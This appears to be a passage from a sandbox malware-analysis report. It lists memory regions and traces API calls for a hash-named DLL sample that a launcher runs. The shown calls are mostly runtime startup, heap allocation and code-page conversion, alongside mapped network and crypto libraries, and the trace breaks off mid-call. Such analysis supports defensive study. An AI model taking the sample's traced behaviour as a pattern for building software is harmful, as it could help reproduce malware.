"\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 619 start_va = 0x1e10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 620 start_va = 0x1fa0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 621 start_va = 0x21a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 622 start_va = 0x25a0000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 623 start_va = 0x2da0000 end_va = 0x3d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 759 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 775 start_va = 0x3d70000 end_va = 0x40a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1125 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1126 start_va = 0x40b0000 end_va = 0x433bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1179 start_va = 0x40b0000 end_va = 0x41fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1201 start_va = 0x40b0000 end_va = 0x4274fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1269 start_va = 0x40b0000 end_va = 0x563bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1371 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1374 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1375 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1376 start_va = 0x40b0000 end_va = 0x427efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1379 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1380 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1381 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1383 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1387 start_va = 0x40b0000 end_va = 0x420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1394 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 21 os_tid = 0x34c [0086.932] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0086.933] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0086.933] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0086.933] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0086.933] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0087.145] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.146] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0087.146] GetProcessHeap () returned 0x4f0000 [0087.146] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.147] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0087.147] GetLastError () returned 0x7e [0087.147] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0087.147] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0087.147] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c8) returned 0x4fc2f0 [0087.147] SetLastError (dwErrCode=0x7e) [0087.147] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1200) returned 0x503440 [0087.149] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0087.149] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0087.149] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.149] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" [0087.149] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" [0087.149] GetACP () returned 0x4e4 [0087.149] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x228) returned 0x4f5350 [0087.149] IsValidCodePage (CodePage=0x4e4) returned 1 [0087.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0087.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0087.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0087.149] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0087.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0087.150] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.150] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0087.150] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0087.150] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0087.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0087.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0087.150] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0087.150] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0087.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0087.150] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x100) returned 0x500f30 [0087.150] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0087.150] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x162) returned 0x4f9a70 [0087.150] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0087.151] GetLastError () returned 0x0 [0087.151] SetLastError (dwErrCode=0x0) [0087.151] GetEnvironmentStringsW () returned 0x504650* [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9cc) returned 0x505030 [0087.151] FreeEnvironmentStringsW (penv=0x504650) returned 1 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x118) returned 0x4f9d80 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3e) returned 0x500ce0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5c) returned 0x4f0780 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x62) returned 0x4f4bd0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x78) returned 0x4fc6c0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x62) returned 0x4f5a10 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x28) returned 0x4fb5c0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x48) returned 0x500830 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x4fb4a0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3a) returned 0x500dd0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x62) returned 0x4f4940 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2a) returned 0x4fc740 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x4f4c40 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1c) returned 0x4fb650 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xd2) returned 0x4f5ca0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x7c) returned 0x4f3fd0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3a) returned 0x500ab0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x90) returned 0x4f3c00 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x4fb950 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x30) returned 0x4f49b0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x36) returned 0x4f5a80 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c) returned 0x500b50 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x52) returned 0x4f9470 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c) returned 0x500600 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xd6) returned 0x4f55e0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x4f20c0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1e) returned 0x4fb440 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x4f2100 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x4f9050 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x52) returned 0x4f91d0 [0087.151] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x4fb980 [0087.152] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x42) returned 0x5001f0 [0087.152] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x4f2140 [0087.152] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x44) returned 0x500010 [0087.152] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x4fb920 [0087.152] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505030 | out: hHeap=0x4f0000) returned 1 [0087.152] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1000) returned 0x504650 [0087.152] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0087.152] GetStartupInfoW (in: 